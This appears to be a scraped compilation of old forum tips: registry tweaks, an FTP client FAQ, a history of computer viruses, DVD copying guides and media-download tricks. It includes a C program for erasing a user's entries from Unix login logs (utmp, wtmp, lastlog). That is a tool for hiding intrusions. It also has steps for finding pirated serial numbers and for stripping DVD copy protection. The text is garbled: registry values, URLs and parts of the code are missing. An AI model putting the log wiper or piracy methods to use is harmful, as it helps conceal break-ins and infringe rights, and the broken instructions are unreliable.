
Flashget Broadband Tweak

Flashget Broadband Tweak

Just double-click on the FlashGetRegTweak.reg file to enter the tweak into the registry. This tweak will allow up to 100 simultaneous file downloads, each split into a max of 30 parts. Previous defaults were 8 & 10 respectively.


      1. Works for dialup but not really advantageous.
      2. Restart your computer to feel the full advantage of this tweak.

here it is
just copy to notepad
rename to Iwillsinglehandedlykillallthebandwidthfromtheserversidownloadfrom.reg


"Max Parallel Num"="100"


Frequently Asked Questions

For most updated content, visit our website

Q: What is FXP?
A: FXP is a term adopted by earlier clients which provided site to site FTP transfers.

Q: When trying to transfer files from one site to another I keep getting this error 500 illegal port command.
A: The FTP Server is set up to not allow or doesn't support FXP. Located in the Site Manager on the Advanced tab, you will find the option "alternative fxp method". By enabling upload/download (depending on the direction of the transfer), you may be able to get the server to allow FXP. Note: It is common for some sites to only allow FXP in one direction and not the other. By enabling alternative fxp method, this problem is sometimes solved.

Q: Why do I keep getting this message: "Only client IP address allowed for PORT command" when trying to FXP?
A: The FTP Server is set up to block FXP. In most cases using alternative fxp method doesn't solve this problem.

Q: I've tried everything but I can't get a site to site transfer to work, what is wrong?
A: Site to site transfers are not supported by some software/hardware configurations. Often, this is due to an incompatibility with NAT (Network Address Translation). NAT is not aware of site to site transfers and when it detects you are attempting to transfer a file, it modifies the FTP protocol to match your local "inside" IP. Several users have reported that Microsoft Internet Sharing is not compatible.

Q: Why can't I see any files? I can see them in other ftp clients.
A: There are two possible reasons.
1. You are behind a firewall and the FTP server is unable to connect to your computer. To resolve this issue you need to use Passive mode. This option is located in Preferences on the Proxy tab. Check "Use Passive mode".
2. The files may be hidden on the ftp server, and in order to see them you need to change the list method. This is located in Preferences on the Options tab. Change the List method to show hidden files. Note: some sites don't allow you to view hidden files and will result in an error. To resolve this problem, go into the Site Manager, select the site and click the advanced tab. Uncheck "show hidden files", then save to keep the changes

Q: I can't see the toolbar icons or the icons are messed up.
A: This problem happens on Windows 95 systems when the \Windows\System\ComCtl32.dll file is out of date. This DLL is responsible for drawing the toolbar buttons and their images. You can download the latest version from this link: MS Common Control Update!

Q: When FXPing why doesn't FlashFXP show a file progress, transfer speed or how much time is remaining?
A: The FXP protocol (site to site) doesn't provide any means of measurement. After one file is FXPed, FlashFXP attempts to estimate the remaining time for the next file and total remaining time for all files in the queue.

Q: Will FlashFXP ever support connecting to more then 2 sites?
A: FlashFXP was designed to provide very easy access and usability to the site to site feature. Allowing more than two would only complicate things. For now let's stick with 2.

Q: Why doesn't FlashFXP support Squid?
A: FlashFXP v1.3 now supports it.

Q: Why doesn't FlashFXP download http:// urls from the clipboard?
A: FlashFXP is not a browser or a web download manager. For FlashFXP you need to use the ftp addresses.

Q: Is it possible to import site lists from another FTP clients?
A: Yes, You can import other site lists into FlashFXP from the Site Manager by right-clicking on the site list and selecting Import from the menu.

Q: FlashFXP looks confusing, All I want to do is download and upload files. I don't need site to site transfers.. help!?!
A: We have just the thing for you, With a click of the mouse FlashFXP can transform into your normal looking FTP client. From the main menu select View then click FTP Only. You can always uncheck this later to bring back the power of site to site transfers.

Q: I use ZipMagic and now all of my zips appear as folders in FlashFXP, how can I make the zips appear as zips?
A: You need to make one small change in the ZipMagic Properties window. First, click the Start Menu, then go to Programs|ZipMagic 4.0|ZipMagic Properties. Click the "Zip Folders" button, then click the "Applications" button. Then just add FlashFXP to the list of applications that sees zip files as files.

Q: I purchased FlashFXP v1.x-1.3 and my key doesn't work for v1.4-v2.0!
A: The key format was changed starting with version 1.4. You will need to email and request a new one. New keys are provided free of charge.

Finding Missing Files From A Release

Finding Missing Files From A Release

I hope this hasn't been submitted before, but i did a search and didn't find anything so here goes.
Have you ever downloaded a game/app/movie/... and when it was finished, you find out that are some missing files or corrupt ones?
Well here's a way to find those files:

This is a service that works through irc (so mirc (or another) must be installed to use it).
You go on the specific channel (manually or by clicking one of the direct links on the site) and then "ask" for the specific file.
When there's someone out there who has it, it will be send to you automatically
If not, the file request shall be put on a queu list untill someone that has it, has sent it to the person that requested it.
!!! Obey the rules though, if not you can be banned from the channel and in severe cases your provider can be banned so others won't be able to use this !!!

I hope this can help out some people here, who have experienced/will experience this

Find Stuff

 Find Stuff

Has this ever happened to you?

You're looking for something on a long web page with Internet Explorer or Netscape. You think it's there, but you're faced with seemingly insurmountable number of paragraphs, sentences, and words to hunt though.

Well, next time this happens to you, hit the Edit menu, Find (or CTRL-F for you shortcut lovers). You'll get a handy little "find" box that lets you type in a specific word. After you type in your search term, hit the Find Next button and Explorer will look for that word on the page. If it's successful, you'll be zapped right to it.

As if that wasn't cool enough, you can also use a variation of this tip in Windows Explorer. Next time you're looking for a file in Explorer, hit CRTL-F and you'll get a Find or Search box (depending on what flavor of Windows you're using).

If you are already in the area of your hard drive where you think the file is (say, My Documents), hit CTRL-F and your search will be set to look in the My Documents sfolder.

Evolution Of Computer Viruses History Of Viruses

part 1

Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start today, we will look at the origins and evolution of malicious code since it first appeared up to the present.

Going back to the origin of viruses, it was in 1949 that Mathematician John Von Neumann described self-replicating programs which could resemble computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a group of programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players’ computers. The creators of this peculiar game also created the first antivirus, an application named Reeper, which could destroy copies created by Core Wars.

However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in a prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.

At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects, but still many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this new operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that their contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.

Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which infected COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when the “Morris worm” appeared, infecting 6,000 computers.

From that date up to 1995 the types of malicious codes that are known today started being developed: the first macro viruses appeared, polymorphic viruses … Some of these even triggered epidemics, such as MichaelAngelo. However, there was an event that changed the virus scenario worldwide: the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa, the first malicious code to cause a worldwide epidemic, opening a new era for computer viruses.

part 2

This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mail became as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viruses spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot sector.

When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately, also infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certain date or time.  In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particular significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers, but just spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfully infecting as many computers as possible.

One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging version of this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to control PC devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.

Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious code. Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication problems across the Internet.

Notoriety versus stealth

For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emitted to catch the user’s attention.  Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to another. This kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm, with virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.

pat 3

This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by computer viruses.

Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new means of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from infecting a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible. This change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.

With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to become seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, which started to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade users to run infected files.

The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effective ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking that the message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.

This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploiting vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malicious code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Internet Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a thing.

Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from the Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.

part 4

In the early days of computers, there were relatively few PCs likely to contain “sensitive” information, such as credit card numbers or other financial data, and these were generally limited to large companies that had already incorporated computers into working processes.

In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through which the information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data stored in IT systems. However, this was achieved through typical hacking activities, with no viruses involved.

The advent of the Internet however caused virus creators to change their objectives, and, from that moment on, they tried to infect as many computers as possible in the shortest time. Also, the introduction of Internet services -like e-banking or online shopping- brought in another change. Some virus creators started writing malicious codes not to infect computers, but, to steal confidential data associated to those services.  Evidently, to achieve this, they needed viruses that could infect many computers silently.

Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse”, or simply “Trojan”. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run, the Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the computers’ hard disk.

After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who design Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite have turned to viruses to commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this

part 5

Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with regard to the evolution of viruses. One of the most influential fields has been the development of programming languages.

These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own specific development and formulation rules, computers in fact understand only one language called "machine code".

Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate with the computer, the better it will understand you, and more complex actions you can ask it to perform.

According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programmers, but not so much for computers. Visual Basic and C are good examples of this type of language.

On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who has not been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".

In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to understand that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming languages used.

In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer history:

- Virus antecessors: Core Wars

As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and programming languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to program them.

Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed -years later- the "Morris worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.

- The new gurus of the 8-bits and the assembler language.

The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new generation of computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowledge of machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn language which allowed users to develop programs simply and quickly. It had however, many limitations.

This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC and PASCAL, mainly).

Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of what can be considered the first 8-bit virus. Its name was "Elk Cloner", and was programmed in machine code. This virus could infect Apple II systems and displayed a message when it infected a computer.

part 6

Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have reached their current level are the development of programming languages and the appearance of increasingly powerful hardware.

In 1981, almost at the same time as Elk Kloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as DOS.

DOS viruses

The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradually establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PCs users grew substantially. Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, written in assembler language and demonstrating a degree of skill on the part of their authors.

Far less programmers know assembler language than are familiar with high-level languages that are far easier to learn. Malicious code written in Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most widely used, particularly in their TurboC and Turbo Pascal versions. This ultimately led to the appearance of “virus families”: that is, viruses that are followed by a vast number of related viruses which are slightly modified forms of the original code.

Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a result, batch processing file viruses or BAT viruses began to appear.

Win16 viruses

The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was just an application to make it easier to handle DOS using a graphic interface.

The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which few programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programming tools for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working tool’. This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family -designed to steal personal information from infected computers-  were identified.

part 7

This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evolution of viruses, as with the development of these, worldwide epidemics also evolved such as the first one caused by Melissa in 1999.

While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its own right, virus creators went back to using assembler as the main language for programming viruses.

Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for creating viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as possible.

With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capable of running script files with a similar syntax.

At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demonstrated that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propagation, proving the saying "anything that can be executed directly or through a interpreter can contain malware." To be specific, the first viruses that infected the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint become ways of spreading ‘lethal weapons’, which destroyed information when the user simply opened a document.

Melissa and self-executing worms

The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear example is Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself out as an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer history in just a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of Melissa.

The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the contacts in the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook address book on the infected computer. Of these, the worm that most stands out from the rest is VBS/LoveLetter, more commonly known as ‘I love You’, which emerged in May 2000 and caused an epidemic that caused damage estimated at 10,000 million euros. In order to get the user’s attention and help it to spread, this worm sent itself out in an e-mail message with the subject ‘ILOVEYOU’ and an attached file called ‘LOVE-LETTER-FOR-YOU.TXT.VBS’. When the user opened this attachment, the computer was infected.

As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/BubbleBoy appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an attached file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed in 2000 by JS/Kak.Worm, which spread by hiding behind Java Script in the auto-signature in Microsoft Outlook Express, allowing it to infect computers without the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attacking computers when the user is browsing the Internet.

Erasing Your Presence From System Logs

                                      ¤¤ Erasing Your Presence From System Logs ¤¤

Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.










#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)

char *who;


    struct utmp utmp_ent;

  if ((f=open(UTMP_NAME,O_RDWR))>=0) {

        while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                          bzero((char *)&utmp_ent,sizeof( utmp_ent ));

                          lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

                          write (f, &utmp_ent, sizeof (utmp_ent));





void kill_wtmp(who)

char *who;


    struct utmp utmp_ent;

    long pos;

    pos = 1L;

    if ((f=open(WTMP_NAME,O_RDWR))>=0) {

        while(pos != -1L) {

           lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

           if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

                pos = -1L;

           } else {

                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                        bzero((char *)&utmp_ent,sizeof(struct utmp ));

                        lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

                        write (f, &utmp_ent, sizeof (utmp_ent));

                        pos = -1L;

                } else pos += 1L;






void kill_lastlog(who)

char *who;


    struct passwd *pwd;

    struct lastlog newll;

        if ((pwd=getpwnam(who))!=NULL) {

           if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

                  lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

                  bzero((char *)&newll,sizeof( newll ));

                  write(f, (char *)&newll, sizeof( newll ));



    } else printf("%s: ?\n",who);



int argc;

char *argv[];


    if (argc==2) {





    } else




Enable Folder and Icon Refresh, Win XP Tweak

 Enable Folder and Icon Refresh

This reg file Enables Folder and Icon Refresh.

1. Copy the following (everything in the box) into notepdad.

Windows Registry Editor Version 5.00


2. Save the file as disablerefreshundo.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled. 

Eliminate Ie's Autocomplete Reminder

Eliminate Ie's Autocomplete Reminder

AutoComplete: Some people like it, some don't. Those who don't like it turn it off. Those of us who turned it off are now constantly being prompted to turn it on. By now, we despise it! How do we turn it off completely, with no more pop-ups asking us to turn it on?

It does seem that Internet Explorer really wants you to use AutoComplete. On a system with AutoComplete turned off, it will prompt you from time to time, asking to turn it on again. A Registry tweak will prevent IE's "helpful" reminders. First, close all IE windows. Launch REGEDIT from the Start menu's Run dialog. Navigate to the key HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel. Note that this key may not be present in its entirety. You may need to create the Internet Explorer and Control Panel subkeys. In the right-hand pane, look for a DWORD value named FormSuggest it will probably not be present. In that case, right-click in the right-hand pane and choose New | DWORD Value from the pop-up menu. Name the new value FormSuggest. Whether you found it or created it, double-click this value and set its data to 1. That should terminate the annoying reminder

Ebay Hackcracktip

Just found this on the net, so I gave it a try.

Lo and behold, it actually works.

Very handy if you are an Ebayer.

When you look at an item and click on bid history all the bid amount are replaced with "-" until the end of the auction.

To view these amounts before the auction ends when viewing the item change

in the address bar to

And then click on the bid history. The bid amounts will be shown.

Easily Find Serial Numbers On Google.., easy to do and works like a charm.

 let's pretend you need a serial number for windows xp pro.

in the search bar type in just like this - "Windows XP Professional" 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.

or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR

just try it out, it's very quick and it works nicely..


here is another trick that works fairly decent for finding mp3's on the web (which is hard to do normally, to say the least)

say you want to get, for example, a Garth Brooks song. type this in the search bar - "index of/" "garth brooks" .mp3 the ones you want to check out first are the ones that say "Index of/" in the title of the search result. this technique allows you to easily pull up web folders with direct downloads. it will look the same as if you were logging into a ftp url.. i'm sure you can be pretty flexible on how you type that in, so long as you include "index of/"

i'm sure you can use this for more than just mp3's (it's not perfect but it has worked for me on a few occasions)

always make sure to use the quotations where i placed them. they help pinpoint the correct search results more accurately. just try it out, also if you want to learn how to do more with google look up "google hacks"

Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies

 Dvd-9 -> Dvd+r Dl, Double Layer To Double Layer!, 1:1 copies

Remove all discs from drives.

Open DVD Decrypter.

From the 'Mode' menu, select 'ISO' -> 'Read'.

Put DVD-9 disc (Thats the film if you didn't guess) in drive.

Take note of the 'Destination' file name.

Click the big 'Decrypt' button.

Wait for it to read and write the image to your hard drive.

Take the DVD-9 disc (yep.. take the original film out) out of the drive.

From the 'Mode' menu, select 'ISO' -> 'Write'.

Put a blank double layer disc in your DVD Writer.

Click the little folder icon - 'Browse for source file' - and select the MDS file created for you as part of the steps above.

Click the big 'Write' button.


Estimated time to read and burn 45 minutes. All copy protection is removed from the backup, and as you are writing to a dual layered disc there is no quality loss!!!

This process can be used to backup DVD5 disc's 1:1 and PS2 disc's.

DVD Regions Information

DVD Regions Information

The DVD region code identifies a DVD's compatibility with the players typically sold in a particular region.

The following graphic shows the approximate location of each region.


Region 0 (or "region free") is compatible with DVD players from any region.

The majority of all current titles play only in one specific region unless otherwise noted. DVDs sold by are encoded for Region 2 or Region 0. Region 2 DVDs may not work on DVD players in other countries.

Region 1 DVDs sold by Marketplace sellers

Region 1 discs are intended for use with standard DVD players in North America (Canada and the USA). In most instances they can also be played on compatible "multi-region" DVD players (also known as "chipped" or "region-free" players).

They also require an NTSC-compatible television. NTSC is the standard picture format in North America, and differs from the PAL format adopted in Britain and Europe. Region 1 DVDs are usually presented in NTSC format, so you should ensure that your TV is capable of reading the NTSC signal before purchasing Region 1 DVDs.

Regional Coding Enhancement (RCE)

Regional Coding Enhancement (RCE) has been added by some film studios (specifically Warner and Columbia) to selected Region 1 DVDs, with the intention of preventing these discs from playing on some multi-region DVD players. We are therefore unable to guarantee that all Region 1 discs will be compatible with all multi-region players.

Global DVD region countries

This is not a definitive list and is intended only as a guide.

Region 1 - US, US Territories and Canada

      American Samoa, Canada, Guam, Palau, Mariana Islands, Marshall Islands, Puerto Rico, Micronesia, United States, U.S. Virgin Islands

Region 2 - UK, Europe, Japan, South Africa and Middle East

      Albania, Andorra, Austria, Bahrain, Belgium, Bosnia and Herzegovina, Bulgaria, Croatia, Czech Republic, Denmark, Egypt, Finland, France, Germany, Gibraltar, Greece, Greenland, Hungary, Iceland, Iran, Iraq, Ireland, Israel, Italy, Japan, Jordan, Kuwait, Lebanon, Liechtenstein, Luxembourg, Macedonia, Malta, Moldova, Monaco, Netherlands, Norway, Oman, Poland, Portugal, Qatar, Romania, San Marino, Saudi Arabia, Slovakia, Slovenia, South Africa, Spain, Sweden, Switzerland, Syria, United Arab Emirates, United Kingdom, Vatican City, Yemen, Yugoslavia

Region 3 - Southeast and East Asia

      Cambodia, Hong Kong, Indonesia, Laos, Malaysia, Myanmar, Phillipines, South Korea, Taiwan, Thailand, Vietnam

Region 4 - Australia, New Zealand, Central and South America

      Antigua, Argentina, Aruba, Australia, Bahamas, Barbados, Barbuda, Belize, Bolivia, Brazil, Chile, Colombia, Costa Rica, Cuba, Dominica, Dominican Republic, Ecuador, El Salvador, Falkland Islands, French Guiana, Grenada, Guatemala, Guyana, Haiti, Honduras, Jamaica, Mexico, New Guinea, New Zealand, Nicaragua, Panama, Paraguay, Peru, Suriname, Trinidad, Tobago, Uruguay

Region 5 - Former Soviet Union, Indian sub-continent, Africa, North Korea and Mongolia

      Afghanistan, Algeria, Angola, Bangladesh, Belarus, Benin, Botswana, Burkina Faso, Burundi, Cameroon, Cape Verde, Central African Republic, Chad, Comoros, Congo, Djibouti, Equatorial Guinea, Eritrea, Estonia, Ethiopia, Gabon, Gambia, Georgia, Ghana, Guinea, Guinea-Bissau, India, Ivory Coast, Kazakhstan, Kenya, Latvia, Lesotho, Liberia, Libya, Lithuania, Madagascar, Malawi, Mali, Mauritania, Mauritius, Mongolia, Morocco, Mozambique, Namibia, Niger, Nigeria, North Korea, Pakistan, Russia, Rwanda, Sao Tome and Principe, Senegal, Seychelles, Sierra Leone, Somalia, Sri Lanka, St. Helena, Sudan, Tanzania, Togo, Tunisia, Turkmenistan, Uganda, Ukraine, Uzbekistan, Zambia, Zimbabwe

Region 6 - China


Region 7 - Reserved for future use

Region 8 - International Territories (ships, planes, etc)

Dvd Copying-ripping Definitions

Dvd Copying/ripping Definitions

To take off the audio or video from a CD or DVD. Often CD Audio is "ripped" to MP3 files or DVD video ripped to VOB files.

The process of removing redundancies in digital data to reduce the amount that must be stored or transmitted. Lossless compression removes only enough redundancy so that the original data can be recreated exactly as it was. Lossy compression sacrifices additional data to achieve greater compression.

Encoding is the process of changing data from one form into another according to a set of rules specifiec by a codec. The data is usually a file containing audio, video or still image. Often the encoding is done to make a file compatible with specific hardware (such as a DVD Player) or to compress or reduce the space the data occupies.

Common video encoding methods are DivX, MPEG-1, MPEG-2 and MPEG-4. A common audio encoding method is MP3 although many others exist including MPEG1 audio, DTS, and Dolby Digital.

On this site generally another name for encoding.

A more technical term would be "The reformatting of content, without changing the source, to another type of content - most often of a different format than the original (but does not have to be)"

NBC News Story
Let's face it, finding the right device driver can be a tedious, time consuming, often impossible task! The Driver Guide was created to make finding driver updates a whole lot easier. With the help of thousands of our members, we have compiled a massive database archive of drivers and resources that is by far the largest and most comprehensive on the Web. Here is what The Driver Guide will do for you:

* Provides an easy step-by-step process for finding and installing drivers.
* Offers a huge searchable archive of over 100,000 driver files, manufacturer information, and links.
* Includes discussion boards that give members the opportunity to interact with others with their hardware type, and learn from their experiences (very useful!).
* Offers a drivers found area where members can upload new and hard to find drivers for others to download.
* Provides a driver request board where members can make requests for specific drivers.
* Includes resources for Windows, Mac, Unix/Linux, and other platforms.
* Provides links to helpful tutorials, valuable utilities, and other resources.
* Offers a great collection of old, out of date, and hard to find drivers.
* Membership is absolutely FREE! Members are given lifetime access to this site.
* Since opening in 1997, millions of people have joined The Driver Guide!

password :all

Dreamweaver Tut That Teaches U, to search a database with phpmysql

Ok, this should work...First of all, there is one great extension for DW & PHP ADODB object model that is free and great! Download it and install from its called PHAKT (NOT impakt, because its not free)
Install it and you will have another type of PHP ADODB document type
Start project with PHP ADODB (not old PHP MySQL)
Page 1
Create form that has one Editbox and one button.
Name Edit box smething like e.g. "search" without quotes.
That form should have form action="results.php" and type set to POST
Not, create Page 2 and name it results.php. Create new recordset in dw
like this
FROM table
WHERE LIKE '%colname%' OR table.other.column LIKE '%colname%' ORDER BY table.tableid
this means that we want to select ALL (*) records in table WHERE content of column is similar (Dav, will return Dave, David, Davidof...) to search keyword.
Next, in variables click + and add variable name colname default value set to % if you want to show all records if form is submited blank, or -1 if You want to show none if form is submited blank. Finaly for Run-time value type $HTTP_POST_VARS['search'] Runtime value is equal name of Edit box name you set up in first page...
Now, from bindings tab, select values and insert it on page, that You would like to show on page. Ill skip this part assuming You know how to format output and how to limit it but if you dont know ask in reply...
So now You have page with results. Test it and see if its working.
If it is, create page 3 and name it details.php. Now, select value from page that you want to link with details page and click on link. Select details.php page and click on parameters. For param name enter something like id since this should be PK in table and unique value, and for value click on lightning icon, and select primary key in your table. In live page link should be like details.php?id=<some_value>.
As for details page recordset it should look like
FROM table
WHERE = 'colname'
create vars as for page 2, but change Runtime to $HTTP_GET_VARS['id']
and format output on page. That should be it, but since im typing it in "realtime" maby i forgot something...
Home I did helped You 

Downloading Windows Media Streams

Downloading Windows Media Streams

Look for the video source url in the webpage source code and copy it:
user posted image
To view the source code, r-click on the webpage that plays the video and select "view source." If unable to do so, just close the window and in the main Internet Explorer (IE) window, click the History icon or press Ctrl+H. Look for the same webpage on the left pane. On the menu, click View > View source.

Paste the video source url in Windows Media Player. (File > Open URL... )
Let the video play now. When the correct title appears on the playlist pane, r-click on it and select "Properties."
Select the source url and copy it:
user posted image

tongue.gif Paste this url in Flashget to download the video clip.

Download Music And Video With ,edia Player9, quick and easy!

 Heres a simple trick i discovered while using media player

Find a site that lets you play music or videos using media player
e.g. ringtones/mp3 and so on.

when media player loads and is playing your music/video click File then Save Media As..

select a place to save to and rename file if you wish but dont change File Type
leave it as Internet Cache then click save.

your music/video will then download quicker than normal download speed and you will then have your file in the location you set.

BUT this won't work with every site so dont panic just try another

It has worked for me on several sites that allow you to listen to music or watch videos online

Download Mp3's Without Using Filesharing

